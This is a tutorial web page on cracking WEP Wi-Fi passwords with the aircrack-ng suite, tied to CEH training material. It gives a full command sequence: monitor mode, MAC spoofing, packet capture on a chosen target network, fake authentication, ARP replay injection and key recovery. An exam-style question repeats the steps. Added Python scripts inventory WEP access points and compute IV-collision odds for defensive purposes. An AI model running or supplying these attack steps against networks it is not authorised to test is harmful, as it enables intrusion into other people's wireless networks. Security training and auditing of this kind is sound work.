How to crack a WEP Password using aircrack-ng

This tutorial assumes that your operating system is Linux, in any of its variants (Kali Linux, Ubuntu, etc.)

Step-by-step Procedure

1. Ensure the aircrack-ng suite is installed on your computer

Open a terminal and type:

sudo apt-get update

Install aircrack-ng suite:

sudo apt-get install -y aircrack-ng

Install macchanger:

sudo apt-get install macchanger

2. Ensure you have a wireless adapter compatible with monitor mode

Open a terminal.

To identify the connected wireless interfaces, type the following command:

iwconfig

If your wireless adapter is external, you need to plug it in. You may run iwconfig twice, before and after plugging it in, so you can easily identify which identifier belongs to your external wireless adapter.

In this tutorial, I assume the card is wlanX (you will probably need to substitute a number for X).

Kill all processes that may conflict with the monitor mode by typing:

sudo airmon-ng check kill

Try to put your external wireless adapter in monitor mode by typing:

sudo airmon-ng start wlanX

If you are not able to do so, you probably need to buy an external wireless adapter that supports monitor mode.

3. Put your wireless card in monitor mode

Stop monitor mode (the monitor interface created above is named wlanXmon):

sudo airmon-ng stop wlanXmon

Bring the wireless card down:

sudo ifconfig wlanX down

Change the MAC address:

sudo macchanger --mac 00:11:22:33:44:55 wlanX

The original MAC address will be restored when you reboot your computer.

Start monitor mode:

sudo airmon-ng start wlanX

4. Scan the wireless networks and identify a WEP access point

Scan available access points (AP):

sudo airodump-ng wlanXmon

Press Ctrl+C to stop the scanner.

Identify the system you want to hack and note its BSSID and channel number (CH).

For this example, CH is 00 and the BSSID is XX:XX:XX:XX:XX:XX
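The scan above is also the quickest way for a network owner to find out whether any legacy WEP access points are still alive on their own estate, since airodump-ng writes a CSV file next to the capture when `-w` is given. The following Python script is an added example, not part of the original page or of the aircrack-ng suite: it parses the access-point table of such a CSV dump and lists every AP whose Privacy column reports WEP. The sample CSV is constructed here, and the column layout (a header row followed by one row per AP, then a blank line and the station table) is assumed from airodump-ng's CSV output.

```python
import sys

# Constructed sample of an airodump-ng CSV dump. The layout below (header row,
# one row per access point, blank line, then the station table) is assumed
# from airodump-ng's CSV output; the MAC addresses and ESSIDs are made up.
SAMPLE_AIRODUMP_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:AA:BB:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -45,  120,    0,   0.  0.  0.  0,  8, OfficeAP, 
00:11:22:AA:BB:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WEP , WEP,    , -60,   80, 1500,   0.  0.  0.  0,  9, LegacyCam, 
00:11:22:AA:BB:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN ,    ,    , -70,   30,    0,   0.  0.  0.  0,  5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50, 40, 00:11:22:AA:BB:02, 
"""

# Column positions in the access-point table (assumed from the header row above).
COL_BSSID, COL_CHANNEL, COL_PRIVACY, COL_IVS, COL_ESSID = 0, 3, 5, 10, 13


def parse_access_points(text):
    """Return one dict per access point found in the AP table of an airodump-ng CSV dump.

    Parsing stops at the blank line that separates the AP table from the station
    table. ESSIDs containing commas are not handled by this simple split.
    """
    aps = []
    in_ap_table = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if in_ap_table:
                break          # blank line ends the AP table; stations follow
            continue           # leading blank line before the header
        fields = [f.strip() for f in line.split(",")]
        if fields[0] == "BSSID":
            in_ap_table = True # header row of the AP table
            continue
        if in_ap_table and len(fields) > COL_ESSID:
            aps.append({
                "bssid": fields[COL_BSSID],
                "channel": int(fields[COL_CHANNEL]),
                "privacy": fields[COL_PRIVACY],
                "ivs": int(fields[COL_IVS]),
                "essid": fields[COL_ESSID],
            })
    return aps


def find_wep_access_points(text):
    """Filter the parsed APs down to those still using WEP (the Privacy column)."""
    return [ap for ap in parse_access_points(text) if "WEP" in ap["privacy"].upper()]


def wep_report(text):
    """One human-readable line per WEP access point, ready to hand to whoever owns it."""
    return [f"{ap['bssid']}  ch {ap['channel']}  {ap['essid']}  ({ap['ivs']} IVs seen)"
            for ap in find_wep_access_points(text)]


if __name__ == "__main__":
    # Usage: python wep_inventory.py [capture-01.csv]; without a file the constructed sample is used.
    data = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_AIRODUMP_CSV
    for line in wep_report(data) or ["no WEP access points found"]:
        print(line)
```

Run it against the `<prefix>-01.csv` that airodump-ng writes alongside the capture; any line it prints is an access point that should be migrated to WPA2 or WPA3, since the rest of this page shows how little effort its key withstands.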

5. Dump wireless packets into a file

Create a capture file where all data from the target AP is going to be stored (-w takes a file name prefix, and airodump-ng writes the capture to <prefix>-01.cap):

sudo airodump-ng -c 00 -w <prefix> --bssid XX:XX:XX:XX:XX:XX wlanXmon

The prefix in this example is “wephack”, so the capture file is wephack-01.cap.

Associate with the AP using fake authentication, so that it accepts injected packets:

sudo aireplay-ng -1 0 -a <BSSID> -h <fake MAC address> wlanXmon

Inject packets and generate traffic (ARP request replay):

sudo aireplay-ng -3 -b <BSSID> -h <fake MAC address> wlanXmon

6. Crack the WEP key

Open a new terminal.

Run aircrack-ng against the capture file, giving the BSSID of the target AP with -b:

sudo aircrack-ng -b XX:XX:XX:XX:XX:XX <prefix>-01.cap

If it does not succeed after some minutes, let airodump-ng collect more IVs and run the same command again.

The key should appear on screen between square brackets.

Process Overview

To break WEP encryption the attacker follows these steps:

  • Start the wireless interface in monitor mode on the specific AP channel. The attacker sets the wireless interface to monitor mode, so that it can listen to every packet in the air, and selects some of those packets for injection.
  • Test the injection capability of the wireless device against the AP. The attacker tests whether the wireless interface is within range of the specified AP and whether it is capable of injecting packets to it.
  • Use a tool such as aireplay-ng to do a fake authentication with the AP. The attacker ensures that the source MAC address is associated, so that the AP accepts the injected packets; without association, the injection fails.
  • Start the Wi-Fi sniffing tool. The attacker captures the generated IVs using tools such as Cain & Abel or airodump-ng with a BSSID filter, so that only the unique IVs of that AP are collected.
  • Start a Wi-Fi packet injection tool such as aireplay-ng in ARP request replay mode to inject packets. To gain a large number of IVs in a short period, the attacker puts aireplay-ng into ARP request replay mode, which listens for ARP requests and re-injects them into the network; the AP rebroadcasts each one, generating a new IV, which is why the attacker selects this mode.
  • Run a cracking tool such as Cain & Abel or aircrack-ng.

Using cracking tools such as Cain & Abel or aircrack-ng the attacker can extract WEP encryption keys from the IVs.

Example of IV injection

Kenneth, a professional penetration tester, was hired by the XYZ Company to conduct wireless network penetration testing. Kenneth proceeds with the standard steps of wireless penetration testing. He tries to collect lots of initialization vectors (IVs) using the injection method to crack the WEP key. He uses the aircrack-ng tool to capture the IVs from a specific AP. Which of the following aircrack-ng commands will help Kenneth to do this?

Command:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

WEP encryption can be cracked with an Initialization Vector (IV) attack, for example using the wesside-ng tool from the aircrack-ng suite.

Start airodump-ng to capture the IVs: The purpose of this step is to capture the IVs generated by the specific AP. Open another console session and enter:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Where:

-c 9 is the channel for the wireless network
--bssid 00:14:6C:7E:40:80 is the AP MAC address. This eliminates extraneous traffic.
-w output is the file name prefix for the file which will contain the IVs.
ath0 is the interface name.

Test wireless device packet injection: The purpose of this step is to ensure that your card is within range of your AP and can inject packets to it. Enter:

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0

Where:

-9 means injection test
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the AP MAC address
ath0 is the wireless interface name

Start the wireless card: Enter the following command to start the wireless card on channel 9 in monitor mode:

airmon-ng start wifi0 9

Substitute the channel number that your AP runs on for “9” in the command above.

Use aireplay-ng to do a fake authentication with the AP: In order for an AP to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated, the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

To associate with an AP, use fake authentication:

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:

-1 means fake authentication
0 is the reassociation timing in seconds
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the AP MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
ath0 is the wireless interface name
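Both the process overview and the capture step in this example revolve around collecting "a large number of IVs". The reason that number is reachable at all is WEP's design: the IV prepended to the RC4 key is only 24 bits, so an access point must repeat IVs after at most 2^24 frames, and by the birthday bound repeats become likely long before that, no matter how long the key is. The following Python script is an added illustration of that arithmetic, not part of the original page or of the aircrack-ng suite; the IV width is WEP's, the packet rate used in the example run is an assumed figure.

```python
import math

IV_BITS = 24                 # WEP prepends a 24-bit IV to the RC4 key
IV_SPACE = 2 ** IV_BITS      # 16,777,216 distinct IVs, independent of key length


def iv_collision_probability(packets, iv_space=IV_SPACE):
    """Probability that at least two of `packets` randomly chosen IVs are equal.

    Exact birthday computation 1 - prod_{i=1}^{n-1} (1 - i/N), done in log space
    so the product does not underflow for large packet counts.
    """
    if packets <= 1:
        return 0.0
    if packets > iv_space:
        return 1.0               # pigeonhole: more frames than IVs guarantees a repeat
    log_no_collision = 0.0
    for i in range(1, packets):
        log_no_collision += math.log1p(-i / iv_space)
    return 1.0 - math.exp(log_no_collision)


def packets_for_collision_probability(p, iv_space=IV_SPACE):
    """Approximate packet count at which the chance of an IV reuse reaches p.

    Standard birthday approximation n ~= sqrt(2 N ln(1 / (1 - p))).
    """
    if not 0 < p < 1:
        raise ValueError("p must be strictly between 0 and 1")
    return math.ceil(math.sqrt(2 * iv_space * math.log(1 / (1 - p))))


def seconds_to_exhaust_iv_space(packets_per_second, iv_space=IV_SPACE):
    """Time until a sender that cycles IVs sequentially is forced to repeat one."""
    if packets_per_second <= 0:
        raise ValueError("packet rate must be positive")
    return iv_space / packets_per_second


if __name__ == "__main__":
    # Assumed traffic figure for illustration: a busy AP pushing 500 frames/second.
    rate = 500
    print(f"IV space: {IV_SPACE:,} values")
    print(f"frames for a 50% chance of IV reuse: {packets_for_collision_probability(0.5):,}")
    print(f"reuse probability after 5,000 frames: {iv_collision_probability(5000):.3f}")
    print(f"sequential IVs exhausted after {seconds_to_exhaust_iv_space(rate) / 3600:.1f} h at {rate} frames/s")
```

The numbers are the practical reason WEP is treated as no encryption at all by current standards: a few thousand frames already give even odds of a reused keystream, and a busy network wraps the whole IV space in a working day. None of this improves with a 104-bit key, because the IV width is fixed by the protocol.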

Hints when configuring wireless connection

Always change the SSID from the default before you put the wireless router into service as an access point. If SSID broadcast is left enabled on an access point, do not use a DHCP server to automatically assign IP addresses to wireless clients, because war-driving tools can easily discover your internal IP addressing when SSID broadcast is enabled and DHCP is in use.

External references

  • Chris Haralson; “How to: Crack WEP Encryption”
  • EC-Council; “CEH v10 Coursework, Module 16: Hacking Wireless Networks, Understanding Wireless Hacking Methodology”
